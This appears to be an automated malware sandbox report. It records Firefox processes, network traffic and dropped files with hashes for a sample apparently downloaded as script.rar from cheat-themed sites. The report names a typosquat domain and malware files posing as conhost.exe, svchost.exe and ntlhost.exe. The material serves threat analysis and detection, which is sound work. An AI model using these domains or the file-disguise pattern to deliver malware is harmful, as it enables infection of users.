"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.24.1034059912\1179834464" -childID 21 -isForBrowser -prefsHandle 6744 -prefMapHandle 6840 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c72ea8ad-080a-4f87-98b4-89775d80d975} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6844 23852bc5458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.25.1230792848\1535693830" -childID 22 -isForBrowser -prefsHandle 8900 -prefMapHandle 5616 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e439fc2-968c-4a76-ade3-53ad5569be96} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9036 2385b7ddd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.26.428696652\547309211" -childID 23 -isForBrowser -prefsHandle 6944 -prefMapHandle 9544 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9896f498-5c26-4c38-afff-ba04755dc0c2} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4696 23854f5eb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.27.1438955387\78141468" -childID 24 -isForBrowser -prefsHandle 6652 -prefMapHandle 8832 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {814dcea2-42fc-4781-8d61-3add77ef9239} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6400 23854fc7258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.28.2141684260\1079199814" -childID 25 -isForBrowser -prefsHandle 6852 -prefMapHandle 8908 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de653d0-582e-4591-ad31-8e3e6857e6d3} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6408 2385398be58 tab

Network

Country Destination Domain Proto
LT 93.115.28.104:80 yotube.com tcp
NL 216.58.214.14:80 youtube.com tcp
NL 216.58.214.14:80 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 216.58.214.14:443 youtube.com udp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com tcp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com tcp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 photos-ugc.l.googleusercontent.com udp
US 8.8.8.8:53 photos-ugc.l.googleusercontent.com udp
NL 142.251.36.1:443 photos-ugc.l.googleusercontent.com udp
US 8.8.8.8:53 206.168.217.172.in-addr.arpa udp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 216.58.214.14:443 youtube.com udp
US 8.8.8.8:53 id.google.com udp
NL 142.251.36.3:443 id.google.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 id.google.com udp
NL 142.251.36.3:443 id.google.com udp
NL 172.217.168.214:443 i.ytimg.com udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
NL 216.58.214.3:443 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com tcp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
NL 216.58.214.3:443 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
US 8.8.8.8:53 3.214.58.216.in-addr.arpa udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 apis.google.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com tcp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 theclashify.com udp
US 188.114.97.0:443 theclashify.com tcp
US 8.8.8.8:53 theclashify.com udp
US 8.8.8.8:53 theclashify.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:443 theclashify.com tcp
US 188.114.97.0:443 theclashify.com tcp
NL 172.217.168.214:443 i.ytimg.com udp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 cheatermad.com udp
US 188.114.97.0:443 cheatermad.com tcp
US 8.8.8.8:53 cheatermad.com udp
US 188.114.97.0:443 cheatermad.com tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
DE 2.22.61.59:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-5hneknee.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4.sn-5hneknee.gvt1.com udp
NL 74.125.8.73:443 r4.sn-5hneknee.gvt1.com tcp
US 8.8.8.8:53 r4.sn-5hneknee.gvt1.com udp
US 8.8.8.8:53 59.61.22.2.in-addr.arpa udp
US 8.8.8.8:53 110.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 73.8.125.74.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.208.110:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp

Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\activity-stream.discovery_stream.json.tmp

MD5 96032a2db8a47d2f33a1b8e9ba4ffc1e
SHA1 c3cfe33a3874aad7ace425a4557bfcb1de57e49e
SHA256 7ab0716a05f823239141e199335ac2b76913d74c422fa82adadf8786283523f7
SHA512 fc40b6be7dfe37ee2b67bd36448459b9f4740d400827c19a0643c199e6c27a0106d8216ca2c2866942b196015cfb6092eca4560b37c5d0f636b9b35e02e1abf8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\prefs-1.js

MD5 f3725e45308da90e594159b7d5caac3a
SHA1 ac8ce683026006936faaf132d7c05565588bd203
SHA256 c8a5f2d464032ff90ce30c472301a513a929dbcd106d9a815fa3c6506cce0a69
SHA512 262a15f62debd32d9619f6acece063d309cc9b003f694a1b14c0d35e446cd737fea2a5dbad85ed844ec579fb20b1bb8fe1d5eb6961cba0b3a1be1b456ea3932e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6b9dbd5b7540bd4f7a945d6e05ebd320
SHA1 b043cf93d21ef0ee7b2ce2e665b38ba1d0c6f807
SHA256 6987763b5a90b326c7763b944bfcdbdd3150f5712fa6dd8f8417647aa033149d
SHA512 37e5cefd78b70cff73e1ba4697c965ebca1057d9b335bed4f7010aec27f7b4f88612470ef356608988d425501b6232ac383289d95a587893987a0429e47a58c0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\prefs-1.js

MD5 2ab6b5cab1d91e63a8cf1fbe9222aae8
SHA1 63a21f141e32cc677ba4e0a0732d227104f7e82d
SHA256 86f054c63d0c78376fa4b0c77cfd17b303608260743126e8498f911069675d50
SHA512 34992cba2f1c1e3924e3f8c2a6449fc21c79efbdf359e5dcb147b58655fd9a2a42bd7af7f8884faa3ca0af6e8481f365c53cbb57fd7b7535fde46b1dd7e92777

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f448274ef839fdbe586a3ac16bca3c3a
SHA1 e4c8d9c4330c1c64038b7a62ef6ffb280ce808bb
SHA256 9f0093444a061437da4f8864f4fd20a4cb02f8c32a0a0cb15a070a2ce3f11068
SHA512 b72bb1ca8b02fa9188c09251a742dcc7c762b8a154a45b8315a31dc41eb7ea4b3a898810b570183ff89b7ae6ed490ce077470a9099685c5d070cdb559fc91a07

C:\Users\Admin\Downloads\script.QWD6pA8q.rar.part

MD5 15ce4e8923d54e718b59c86b3e3d45d6
SHA1 cf2784e39cb5ef028478787e35934f81c163f85e
SHA256 b8ea6f789a75705caa6e6bd3105addae1e30c3118cec14f509c13f3308250d8f
SHA512 bca1cea79cfaff138f30135a3d4cc8aa84e388ca3b0781a6ab13e867a5f90c678a61a442f06a96283c651111c54d0917956910ae00fd37d08c8aca877eeac6cb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 7a4dd2d7c76a3b55b77a4cf7ba3489ab
SHA1 86d7be4649a3dcc89794aafa064ba46fe8814b94
SHA256 9192df10cf2ad30f2a530224f9a1c5538c6e46f7a1c7d73bffbab3ca2c30949f
SHA512 8d60a2cd54cb6060129962dda35aa708ea092183226ca5dab2ac690a329e75423da82d073b406836b4affcb638d5c0adda476d42c0d2f364e1d8eca89a3fcf70

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 2f7bb23fe3b44068c1d988dab62e9486
SHA1 be31eaccfe37edfef40aed3abca7e3e9e2db8dd9
SHA256 c02d0a1fffd37f9b5fe7e2e5d7db5591952f88ea7a9b12c91beeb1bd0df4dc4d
SHA512 e9d7a94d4026085e118672def59cd6b25635db1c4a5b351d9d1dbbc0321a9eb658267766bd004d62b5a45341b140818c5c9778ccbe9b8edf99665b895cfe861f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\doomed\17142

MD5 062d7b4832562d0e32376705bdf8f9dc
SHA1 034e8242310d9b0af6e85767cd9a4b4db1a24b37
SHA256 7e688063092f19778f0487ac9ca1f0d41847df4db55ed0d227d3c2b16f61a730
SHA512 9f17ec5bb8a0556488c9c10d67cee3b4d3bde609b022d21c0993835f500721de857e1b8818f926371da2bfc830b362425ca5a56ce9a43cebb9e53d13f3ea69c0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\doomed\1982

MD5 b6a968bb04ee76a6127eff4df117aea8
SHA1 06cdc70abff96945b3b063ea9f9fd0e90572e945
SHA256 44e77520c5c02b6958518c267b80a06c9b4f8be0cffed09a91cef45bbeaf830c
SHA512 6a8d82f1235e340d9934113b313e3d6ec9874d0a511771c0ef132794793c45ee5a057b21688989cac73087ce2d64e28346721677c30a4e6f2a47d3280ce8623e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 77fc331fd24022f2c1874171dc0b3218
SHA1 c1912635f99142dd81923ce162f7145fe79d5e81
SHA256 2dfac450dcfcffa9fca56e2a1f856b3ea1cefde8a9f25bdc48d62eef24d67891
SHA512 78b21a4579f6dc936bf3a325561fa62feb8a8dd260353367723fdf4c1fc6f95e7763cfd3f67f7edc1b8fc83b8dc08daefcf83f3249c66af26ec06098a9ae824a

C:\Users\Admin\Downloads\7z2301-x64.exe

MD5 e5788b13546156281bf0a4b38bdd0901
SHA1 7df28d340d7084647921cc25a8c2068bb192bdbb
SHA256 26cb6e9f56333682122fafe79dbcdfd51e9f47cc7217dccd29ac6fc33b5598cd
SHA512 1f4da167ff2f1d34eeaf76c3003ba5fcabfc7a7da40e73e317aa99c6e1321cdf97e00f4feb9e79e1a72240e0376af0c3becb3d309e5bb0385e5192da17ea77ff

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 342550bdd3cd63a6e3e90339afa293a4
SHA1 71c74a03ea397340b0ba8aed5af2f157017348be
SHA256 6dca895da8786e8624f77150660aa1433f6e514c8c52002f7b512cea35407d0d
SHA512 db43d869d506d623da4433e8b40cde2bbf713ea8f96aecaea83c99c740566b280c01b29b52402a44fd893ed6f2d445dd46a3a3f762f1b483fce6c143bd95f85b

\Program Files\7-Zip\7-zip.dll

MD5 956d826f03d88c0b5482002bb7a83412
SHA1 560658185c225d1bd274b6a18372fd7de5f336af
SHA256 f9b4944d3a5536a6f8b4d5db17d903988a3518b22fbee6e3f6019aaf44189b3d
SHA512 6503064802101bca6e25b259a2bfe38e2d8b786bf2cf588ab1fb026b755f04a20857ee27e290cf50b2667425c528313b1c02e09b7b50edbcd75a3335439c3647

C:\Program Files\7-Zip\7zG.exe

MD5 50f289df0c19484e970849aac4e6f977
SHA1 3dc77c8830836ab844975eb002149b66da2e10be
SHA256 b9b179b305c5268ad428b6ae59de10b4fe99cf0199bbc89b7017181905e97305
SHA512 877d852ea1062b90e2fd2f3c4dc7d05d9697e9a9b2929c830a770b62741f6a11e06de73275eb871113f11143faf1cb40d99f7c247862ffb778d26833ed5d7e38

\Program Files\7-Zip\7z.dll

MD5 4e35a902ca8ed1c3d4551b1a470c4655
SHA1 ad9a9b5dbe810a6d7ea2c8430c32417d87c5930c
SHA256 77222e81cb7004e8c3e077aada02b555a3d38fb05b50c64afd36ca230a8fd5b9
SHA512 c7966f892c1f81fbe6a2197bd229904d398a299c53c24586ca77f7f657529323e5a7260ed32da9701fce9989b0b9a2463cd45c5a5d77e56a1ea670e02e575a30

C:\Program Files\7-Zip\7z.dll

MD5 4e35a902ca8ed1c3d4551b1a470c4655
SHA1 ad9a9b5dbe810a6d7ea2c8430c32417d87c5930c
SHA256 77222e81cb7004e8c3e077aada02b555a3d38fb05b50c64afd36ca230a8fd5b9
SHA512 c7966f892c1f81fbe6a2197bd229904d398a299c53c24586ca77f7f657529323e5a7260ed32da9701fce9989b0b9a2463cd45c5a5d77e56a1ea670e02e575a30

C:\Users\Admin\Downloads\script.rar

MD5 15ce4e8923d54e718b59c86b3e3d45d6
SHA1 cf2784e39cb5ef028478787e35934f81c163f85e
SHA256 b8ea6f789a75705caa6e6bd3105addae1e30c3118cec14f509c13f3308250d8f
SHA512 bca1cea79cfaff138f30135a3d4cc8aa84e388ca3b0781a6ab13e867a5f90c678a61a442f06a96283c651111c54d0917956910ae00fd37d08c8aca877eeac6cb

C:\Users\Admin\Downloads\script\script.exe

MD5 043cf41c0fe957ccd6a71e808b2384b8
SHA1 0baaae425d1cb9cb80cfed95a700ce43bdd92e13
SHA256 289e4679c8b169e6209aa3a6c7875da9705225edb1ac3cf06ea88dd4236c849c
SHA512 033591d80a2d9e16bd25ca456b8c908d08cb30f30154f67ea53f8a0053217c519ef843a2f4406d3150c28e9219c63f8610a9c2ec97480498a0fc6085cfbb4c1e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cookies.sqlite

MD5 2e8985947187b3604e0bee8288e73acb
SHA1 5bea31a692ab37f9978f2cd3e78139d9d3d429e5
SHA256 5f4084e2f9a8dafe542e96ce1b93ccd85540de8e1d6e3acee7b96caee93ee90a
SHA512 5a4286e4025d0698b1020958c0ec396e9057449c884c47d6e9c58ac9a1ea153a9539de0314c430775ab5bc6c34e1fc7a174b2b58d830ef09416ddfbcb7b53ac9

C:\Users\Admin\AppData\Local\Temp\conhost.exe

MD5 a94b437f0e3f94d1b6427002d137d927
SHA1 2bd679e0d49c1dec51c44f86ac935c810dd96f8b
SHA256 ca11d0fef6aad8481e038660b5ad9b8be14614b46be2a624e630b446749d581f
SHA512 85d2e475477ad637059b3a4a01ba8d98e33cd58f66a6f67bfb48f88746911e51fc513ec7f6e068c7844360f4eeeccdc8b551bdf0e18b15ceb4c6d00489605771

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Applaunch.exe.log

MD5 a25a4a5e90923e58107eb7a930ca67d3
SHA1 828fc8f86350eaa731d8e8e68c6420bb54d4f76d
SHA256 2ff5d4fe5feea05ffcc79009e7c21a8fcfaea60af29523060130f2453a0a49f0
SHA512 2ea15e62faff445c28b88e4f9102d4515914710ddfafa5ad2c81ad37cada19c7e3080264621771a28ab13a2ee70f46527a2af5e6bf06c7bd5998d9bbdeeb5ccc

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 ae01d4d2bef26b49814f92862a7c835a
SHA1 9478789e4e1f19a99c51f081dd783043baf86094
SHA256 1ae44cc7d29c61903bed9e1a90b15d65313cb8f9de6a5254f4d27970d5c67fa2
SHA512 8a852f668427b28839d928fc8bc9c05bc83e0179382cf30d3a76b10dfab5da8be1a57266ee5fa19a23df3f37ece9ad7c1383d9746340e66e2fe3f1e71ce9dfd8

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 cbe112b186d443cff69816f1cc42fb41
SHA1 9d063a5ed79b9dc83877893bddf36eef179f2ea9
SHA256 06b688ca2b776e8c334c0ce38b8d19615f7fed66cd43dc9812a61a9f0f9bf9f8
SHA512 d2b2e521f8410ade52c4e2818998907728a3c3cacf5a082d1d080e80cad2bd2081b658b9a2d7616fb269dba1fb343f0b39c04df58a6ad66a922e4365f893e539

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

MD5 8a9e372d4bb86ce61feb1dbd0eab13b1
SHA1 9a9c7131359bfedf7545b088a2dedbf53faf8240
SHA256 64d9b7f7597c73b4c04e474313334cb57a6330887cc5501ff69dcd9340eea777
SHA512 a38cb731c6769f01265ac24b9fa3cd2a0416698f8097ea924f975628d0c96dedbbf12ef35271889d7b6816d140715c6ff7a55e99f800e5e6a5f2288906118964

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 c69ede2d5b33d01a6df6ecf0102e9fff
SHA1 6fbfbd8c28291adeb8d7c8c2a07f779509eb9235
SHA256 b0b6419444760d3e472a77f561037803a7d1e52517ca9c50c3fa55da304ec85f
SHA512 b2f731b85e162590902b543b772a04716d5e6573a458eab5a19053675b10a303f8b0364e43fae37f7810e48f1c5183eda5990b6785364be4f4c63fe3c2dd063b

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

MD5 d8fc96c146e66d12afcbf96b346cab05
SHA1 3e5279f40c078fcb71e60c744eaba5f196195748
SHA256 7ea069593b121866d47986d8f52bf9a4b2e4dfb5c310a7c38a524950525671f7
SHA512 96c21c35f0fdc05a81847fd1c32ece80c74c913d368bbeaca9db402784eb63413dcfa1c0470f46d4f440ffef269dd78eaf6df4159c647935462d32a6f4486029

C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

MD5 d8fc96c146e66d12afcbf96b346cab05
SHA1 3e5279f40c078fcb71e60c744eaba5f196195748
SHA256 7ea069593b121866d47986d8f52bf9a4b2e4dfb5c310a7c38a524950525671f7
SHA512 96c21c35f0fdc05a81847fd1c32ece80c74c913d368bbeaca9db402784eb63413dcfa1c0470f46d4f440ffef269dd78eaf6df4159c647935462d32a6f4486029

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 7c9a8ec532f7d5b1bff2214d10a31f5e
SHA1 47d0e477ece141d2399dedee7f525f3f872c7776
SHA256 5135bb80e45c9fe2de369fbf2f4f6eb8cb86b736ca099a9a7e20eba2613df877
SHA512 a1d65c22bfe81e0f62b88053a590727895b240d9992610c1f8922748826b919c785b7543f4e69bb632f3e07e0b22af706e059e2ea29255bf05e19c1002ce3ea3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3o4egspq.fll.ps1

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\Downloads\script\script.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\storage\default\https+++www.youtube.com\idb\2257848399LCo7g%sCD7a%t8a9b9a3s.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\storage\default\https+++www.youtube.com\cache\morgue\197\{ba3c9a20-0fef-40ae-8cdd-109d121635c5}.final

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\storage\default\https+++www.youtube.com\idb\3211250388sbwdpsunsohintoatciif.sqlite-wal

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\prefs.js

C:\Users\Admin\AppData\Local\Temp\tmpaddon

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\prefs-1.js

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\broadcast-listeners.json


MD5 8ed861505163c1ce4a04524d7202cc56
SHA1 b731a696c0273941655c7aa52dca7c1e9bbdc78d
SHA256 d784cf7ea07ad53dab23f36cc2f2bd98d4f057507045939b7be4342cf940c895
SHA512 effd19193a96cdd60f9c58d0623b07b1e5516c1d89798a7955dafb51f5ad17238768a5de46a2a8ed028facc3b592f6b0233bcf98bde4254e0c8950f9aff1cd01

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\F96A1A8368D3C3DD1FA81D170326E6C1C65D342F

MD5 bab19cd7ba8004330b85587eeb66bc3b
SHA1 08cd813323da1195f08bcb8fa47d5cb2e031b6b9
SHA256 83f6241245343bd4cdc375d32d219e50382958a545c83cd4426c900a650149b3
SHA512 433a5515b6629277405de23cb012b81d9104e8d2f3820bb6a2d8c1932bbdbfbe4868fbe1b0960d0578a0b677dda9f726b0caedcbc6bde2379536d932b889382f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\B38D561328085A426A5E753F7697FAEB14208024

MD5 41b514f9ba8c69aea54b6d7bc4e2699a
SHA1 4f4dfed69a45a20d43a83f80e0257ed875baff41
SHA256 354d92b92e20e420b1ee18d8120bafee3f3426b816edf65f46259f33ad1c0ef4
SHA512 016b054af1827d231ac0682691da6f01bce4ba7c2e187de8ea07a389fdb62c036eec59222bc9e16eb9968aad72aa678021009f89c45cb4116992cab136ad9163

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\cache2\entries\7B2FF60388B306A9378122F65F064A1B8F966B2E

MD5 c0e3638196967860f5b9386f5a6c059f
SHA1 5ffedc5ad006b9272cb62e200198bc0c598b1af6
SHA256 35ded87bdfc0b759b64b777487fdbac31defd556d3a222d9162f7555e735f527
